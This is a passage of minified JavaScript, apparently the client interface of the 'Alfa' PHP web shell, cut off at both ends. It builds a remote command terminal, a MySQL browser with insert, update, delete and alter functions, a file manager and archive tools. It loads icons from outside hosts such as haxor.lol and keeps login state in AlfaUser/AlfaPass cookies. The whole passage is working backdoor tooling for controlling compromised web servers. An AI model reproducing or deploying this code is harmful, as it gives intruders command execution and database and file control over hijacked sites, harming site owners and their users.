50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://haxor.lol/love/loaders.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 